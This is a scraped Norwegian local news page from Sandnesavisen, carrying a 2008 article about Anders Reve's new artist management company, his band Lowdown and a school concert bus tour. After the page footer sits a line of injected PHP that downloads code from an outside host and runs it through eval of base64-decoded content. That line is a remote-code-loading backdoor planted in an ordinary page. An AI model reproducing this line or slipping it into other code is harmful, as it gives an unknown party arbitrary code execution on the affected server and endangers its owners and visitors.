Tryggbarna1
GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
26. juni 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vr - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bker
Musikk
Film
Byen vr
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrtt
Figgjo
Ganddal
Hana
Hle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Hndball
Kultur
Politikk
konomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Bt
Tog
Nytt lokalt management for artister
Skrevet av Harald Halvorsen   
mandag 08. desember 2008

Sandnesavisen tok en prat med Anders Reve om hans nyetablerte “Reve Management”.

Nytt lokalt management for artister
Det er mye snakk. Mye drømmer og mye partyfaktor. Men lite hardt arbeid, pågangsmot og målvilje når det kommer til stykket. Det er derfor det bare er “one in a million” som klarer det, sier Anders Reve. Foto: Privat

Reve Management er et resultat av mange års figurering i det lokale musikklivet. Som primus motor - gitarist, manager og agent i bandet “Imprint” har Reve opparbeidet seg solide kunnskaper, kontakter og erfaringer rundt det å spille i band, stå på scenen, skaffe spillejobber og lignende. Og som mangeårig bookingansvarlig i Sandnes Rockeklubb har han også et etablert kontaktnett og kunnskaper fra arrangørsiden av bransjen. Reve sluttet i både Imprint og som bookingsjef av forskjellige årsaker, men ville ikke la hele nettverket og erfaringene gå til spille. Han ville benytte disse og han ville tjene penger på det, og han legger ikke skjul på sine hensikter med Reve Management.

Vil ha betalt

Han har, som han selv sier - “jobbet dugnad hele livet, nå vil jeg ha betalt”. Reve sier det som det er - han gjør det for pengene. Han plukker band/artister han har tro på, for ideen er at "tjener ikke artistene penger så tjener ikke Reve Management penger". Tidligere i år signerte han med bandet Lowdown – som etter hans mening er Norges beste metalband i den moderne sjangeren. Han har også fått endel henvendelser etter et intervju på nettstedet heavymetal.no i vår. Noen interessante - de fleste totalt uinteressante. Grunnen til det siste kan være mange, men Reve sier det slik: - “Det er mye snakk. Mye drømmer og mye partyfaktor. Men lite hardt arbeid, pågangsmot og målvilje når det kommer til stykket. Det er derfor det bare er “one in a million” som klarer det”.

Reve mener det ikke nytter å sitte på baken og vente på å bli oppdaget. Det er ingen som klarer seg på den måten. - “Det kan være enkelt å skylde på omstendigheter utenfor våre egne påvirkningsmuligheter, men stort sett har vi alle oss selv å takke”. Reve er en potet for band og artister. Og også for arrangører av ulike slag. Han kan litt om alt - og alt om litt. Det er ikke sikkert han kan tilby gull og grønne skoger til band og artister ut av det blå. Ikke uten at de har noe å tilby tilbake. Det må være et gjensidig samarbeid hvor begge parter står på og bidrar for å nå en felles målsetting. Det gjelder bare å bli enige om hvor det er folk vil, og så må man sette seg ned og legge en slagplan og jobbe. Strukturert. Et ord som ofte har vist seg lite kompatibelt med kreative hoder...

Lowdown

Til nå har Reve hatt hendene litt rundt omkring. Han har som sagt signert med Lowdown, som tilbringer mye tid på øvingslokalet for tiden. Ellers ble han hyret inn av AKKS Stavanger for å være prosjektleder på “Bandbussen” hvor to lokale band - Frøken Fryd og Johnny Hancocks - var på en intensiv lokal turné fra Egersund i sør til Haugesund i nord. Her fikset han band, spillesteder, økonomi, var med på alle konserter, rigget opp og ned, snakket og motiverte, og kranglet og lo med alt og alle. Åtte dager i strekk tilbrakte de på veien i en svær buss stappet med PA-anlegg, lysrigg og egne teknikere og mediateam.

Bandene spilte minimum to konserter til dagen - en barneskole på dagtid og en fritidsklubb på kvelden, og PR-runder på ungdomsskoler og videregående skoler i mellomtiden. Ofte ble det to konserter på dagtid. Hele prosjektet ble en braksuksess, og publikum ble observert flyvende fra ribbevegger, dansende i bar overkropp og ellers så ivrige etter autografer at det til tider seriøst ble vurdert å gå til anskaffelse av bodyguards. Reve ligger ikke på latsiden på hjemmefronten heller. Han definerer bedriften sin verken som en heltids- eller deltidsjobb, men mer som en fritidsjobb - hvis det er noe som heter det. Han jobber til daglig 80% som lærer og 20% som ungdomsarbeider, i tillegg til 100% som småbarnsfar og ektemann. Og selv om Bandbussen er parkert for året har han litt å henge fingrene i på hjemmekontoret. Han har tro på en ny busstur neste år, og i mellomtiden representerer han det nye tiltaket Great Moments i et lignende prosjekt. Dette vil være et noe kortere prosjekt på mer etablerte spillesteder, men mer kan han ikke røpe nå.

 

 

 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));